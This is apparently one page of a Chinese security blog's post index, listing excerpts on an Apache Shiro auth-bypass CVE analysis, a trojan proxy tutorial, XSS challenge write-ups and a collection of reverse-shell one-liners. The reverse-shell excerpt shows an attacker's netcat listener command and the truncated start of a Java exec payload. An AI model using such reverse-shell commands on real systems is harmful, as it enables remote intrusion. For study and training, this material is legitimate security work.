加载中...
因上努力 果上求缘
供应商是如何一层一层一层地拿下项目经理的 供应商是如何一层一层一层地拿下项目经理的
0x10 前言本文引用的案例都是切实发生过的,主要以国内供应商居多,国外代理商也有类似情况,但是相对会少。 他们最终的目标就是通过非正常途径中标,只要未签合同你就是爸爸,但是签了合同什么都不好说,甚至还可能把公司很多信息都套走。 另外,以下
2020-09-18
CVE-2020-13933 漏洞分析 CVE-2020-13933 漏洞分析
Apache Shiro < 1.6.0 身份验证绕过漏洞: Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理,通常会和 spring 等框架一起搭配使用来开发 web 应用
2020-09-09
trojan 睁眼看世界教程 trojan 睁眼看世界教程
trojan 简介trojan 是近两年兴起的科学上网工具,项目源码为 https://github.com/trojan-gfw。 与强调加密和混淆的 SS/SSR 等工具不同,trojan 将通信流量伪装成互联网上最常见的 HTTPS
2020-08-28
各种语言的一句话反弹 shell 命令 各种语言的一句话反弹 shell 命令
攻击主机先监听端口最简单的脚本可以用 nc : nc -lvvp 9527 被攻击主机连接到服务端口一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了: JAVARuntime.getRunti
2020-08-17
【prompt(1) to win】 Level H1 - Hoisting 【prompt(1) to win】 Level H1 - Hoisting
来源:prompt(1) to win 题目:Level H1 - Hoisting 题目(隐藏关卡)function escape(input) { // WORLD -1 // strip off certain
2020-08-05
【prompt(1) to win】 Level F - Length2 【prompt(1) to win】 Level F - Length2
来源:prompt(1) to win 题目:Level F - Length2 题目function escape(input) { // sort of spoiler of level 7 input = inp
2020-08-04
【prompt(1) to win】 Level E - Base64 【prompt(1) to win】 Level E - Base64
来源:prompt(1) to win 题目:Level E - Base64 题目function escape(input) { // I expect this one will have other solutions
2020-08-02
【prompt(1) to win】 Level D - Json Object 【prompt(1) to win】 Level D - Json Object
来源:prompt(1) to win 题目:Level D - Json Object 题目function escape(input) { // extend method from Underscore library
2020-07-30
【prompt(1) to win】 Level C - ノ┬─┬ノ ︵ ( \o°o)\ 【prompt(1) to win】 Level C - ノ┬─┬ノ ︵ ( \o°o)\
来源:prompt(1) to win 题目:[Level C - ノ┬─┬ノ ︵ ( \o°o)](http://prompt.ml/12) 题目function escape(input) { // in Soviet R
2020-07-29
【prompt(1) to win】 Level B - In Exception 【prompt(1) to win】 Level B - In Exception
来源:prompt(1) to win 题目:Level B - In Exception 题目function escape(input) { // name should not contain special chara
2020-07-28
【prompt(1) to win】 Level A - (╯°□°)╯︵ ┻━┻ 【prompt(1) to win】 Level A - (╯°□°)╯︵ ┻━┻
来源:prompt(1) to win 题目:Level A - (╯°□°)╯︵ ┻━┻ 题目function escape(input) { // (╯°□°)╯︵ ┻━┻ input = encodeURICom
2020-07-26
【prompt(1) to win】 Level 9 - ECMAScript 【prompt(1) to win】 Level 9 - ECMAScript
来源:prompt(1) to win 题目:Level 9 - ECMAScript 题目function escape(input) { // filter potential start-tags input =
2020-07-22
9 / 36